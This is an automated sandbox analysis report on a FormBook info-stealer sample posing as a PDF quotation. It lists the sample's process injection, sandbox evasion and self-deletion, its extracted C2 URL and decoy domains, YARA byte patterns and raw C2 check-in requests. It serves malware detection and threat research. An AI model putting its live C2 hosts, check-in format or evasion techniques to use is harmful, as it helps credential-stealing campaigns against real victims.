Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Solicitud urgente de Quotaion_U1197,pdf.exe

Overview

General Information

Sample Name:Solicitud urgente de Quotaion_U1197,pdf.exe
Analysis ID:532838
MD5:985db7fdfcf2aa38a0b75c22f06b2756
SHA1:5f51dec30f3a649fc49e95e3421bc247cf9c40c7
SHA256:6e4323460316f29ecdaa2b49fbe733c11ea3a040cf7336e177ac9345ddac21c1
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Solicitud urgente de Quotaion_U1197,pdf.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe" MD5: 985DB7FDFCF2AA38A0B75C22F06B2756)
    • Solicitud urgente de Quotaion_U1197,pdf.exe (PID: 6120 cmdline: C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe MD5: 985DB7FDFCF2AA38A0B75C22F06B2756)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6516 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6960 cmdline: /c del "C:\Users\user\Desktop\Solicitud urgente de Quotaion_U1197,pdf.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.coralxlix.com/c1h5/"], "decoy": ["ui4dev.com", "horrycountyrealtor.com", "abivz.icu", "toxicwokeness.com", "fillthegap.site", "surprisessinside.com", "metaversefinder.xyz", "freeshipflowers.com", "apacheicon.com", "greenfootprintpros.com", "topauonlinecasino.com", "weqffg.site", "bountylux.com", "eedrvheyn.sbs", "whiskeybentmobile.com", "yupeg.xyz", "thenorthwesthome.com", "cyril.ventures", "zukunsmart.com", "1l7kng51j4nm.site", "nigeldavies.net", "8sscal.icu", "8wngeu.icu", "paramountnewtwork.com", "homehelperscalifornia.com", "tropicalbooking.com", "samsungwr.com", "gravityarchive.com", "hatdieuhoanglinhlinh.com", "masterysystemsinternational.com", "handandstoneparma.com", "tucsongolfacademy.com", "wholesalepoolkits.com", "2lovit.com", "calista-platinum.com", "dark9a.com", "sextremeboudoir.com", "dalmonello.com", "gyqfnc.com", "wqbz1.com", "kentuckyductless.com", "automotive-forensic.com", "metacityelves.com", "yckzy.com", "therobotians.com", "38qp2.com", "xqibit.site", "xn--o39a00am61aa311e3tj68d.com", "theb8szsk5vkv.com", "blackfridaypromoamericanas5.com", "4746390.win", "binkybones.com", "bridalhuich.com", "marceanahata.com", "kostense.email", "wellingboroughbid.com", "afxwn.icu", "nofrdictrack.com", "smohjs.com", "yjefcalg1p.top", "haseeb-wp.site", "analytics-at-scale.com", "adqc3.icu", "berekende.ink"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 17 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6516

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.coralxlix.com/c1h5/"], "decoy": ["ui4dev.com", "horrycountyrealtor.com", "abivz.icu", "toxicwokeness.com", "fillthegap.site", "surprisessinside.com", "metaversefinder.xyz", "freeshipflowers.com", "apacheicon.com", "greenfootprintpros.com", "topauonlinecasino.com", "weqffg.site", "bountylux.com", "eedrvheyn.sbs", "whiskeybentmobile.com", "yupeg.xyz", "thenorthwesthome.com", "cyril.ventures", "zukunsmart.com", "1l7kng51j4nm.site", "nigeldavies.net", "8sscal.icu", "8wngeu.icu", "paramountnewtwork.com", "homehelperscalifornia.com", "tropicalbooking.com", "samsungwr.com", "gravityarchive.com", "hatdieuhoanglinhlinh.com", "masterysystemsinternational.com", "handandstoneparma.com", "tucsongolfacademy.com", "wholesalepoolkits.com", "2lovit.com", "calista-platinum.com", "dark9a.com", "sextremeboudoir.com", "dalmonello.com", "gyqfnc.com", "wqbz1.com", "kentuckyductless.com", "automotive-forensic.com", "metacityelves.com", "yckzy.com", "therobotians.com", "38qp2.com", "xqibit.site", "xn--o39a00am61aa311e3tj68d.com", "theb8szsk5vkv.com", "blackfridaypromoamericanas5.com", "4746390.win", "binkybones.com", "bridalhuich.com", "marceanahata.com", "kostense.email", "wellingboroughbid.com", "afxwn.icu", "nofrdictrack.com", "smohjs.com", "yjefcalg1p.top", "haseeb-wp.site", "analytics-at-scale.com", "adqc3.icu", "berekende.ink"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeVirustotal: Detection: 40%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.weqffg.site/c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdzAvira URL Cloud: Label: phishing
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Solicitud urgente de Quotaion_U1197,pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.372947461.0000000001760000.00000040.00000001.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.373171059.000000000187F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000A.00000002.568927904.00000000046FF000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000002.568800270.00000000045E0000.00000040.00000001.sdmp, msdt.exe, 0000000A.00000003.372669343.0000000000BA0000.00000004.00000001.sdmp
          Source: Binary string: msdt.pdb source: Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000002.374490379.0000000003680000.00000040.00020000.sdmp, Solicitud urgente de Quotaion_U1197,pdf.exe, 00000006.00000003.365732847.0000000003680000.00000004.00000001.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49872 -> 192.0.78.24:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49872 -> 192.0.78.24:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49872 -> 192.0.78.24:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.afxwn.icu
          Source: C:\Windows\explorer.exeDomain query: www.weqffg.site
          Source: C:\Windows\explorer.exeNetwork Connect: 156.234.12.248 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeDomain query: www.analytics-at-scale.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.233.244 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.coralxlix.com/c1h5/
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz HTTP/1.1Host: www.weqffg.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz HTTP/1.1Host: www.afxwn.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz HTTP/1.1Host: www.analytics-at-scale.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Dec 2021 17:39:27 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 17:39:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: msdt.exe, 0000000A.00000002.569235088.0000000004FFF000.00000004.00020000.sdmpString found in binary or memory: https://www.analytics-at-scale.com/c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJ
          Source: unknownDNS traffic detected: queries for: www.weqffg.site
          Source: global trafficHTTP traffic detected: GET /c1h5/?2do4nxu0=xDzgA/AT2jMmjnlrkj7rt3ckDtoX4QGQrpVL2KD3Bff+aUtt+S7+kl+hKb5L2UO+/CvD&q4Y4=kvWdz HTTP/1.1Host: www.weqffg.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c1h5/?2do4nxu0=dDVdw41TThH+tglXdiSPLe9aGuOwvr9FdRXdYLI3Qef1kwVllG2roDseQXIwgkVkVQDX&q4Y4=kvWdz HTTP/1.1Host: www.afxwn.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c1h5/?2do4nxu0=eCqut3pLTAp695DvAk1SvvQ7mDNC6PWTA4g6LTP2Tz9bKaOndJvYlqsLJ7dAZrG7pLSW&q4Y4=kvWdz HTTP/1.1Host: www.analytics-at-scale.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.338321770.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.372402095.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.563987618.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.354531059.00000000100B5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373637862.0000000001A90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.558246949.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.301296785.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Solicitud urgente de Quotaion_U1197,pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.298321821.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.560174409.0000000000770000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.372897742.0000000001730000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.298732907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
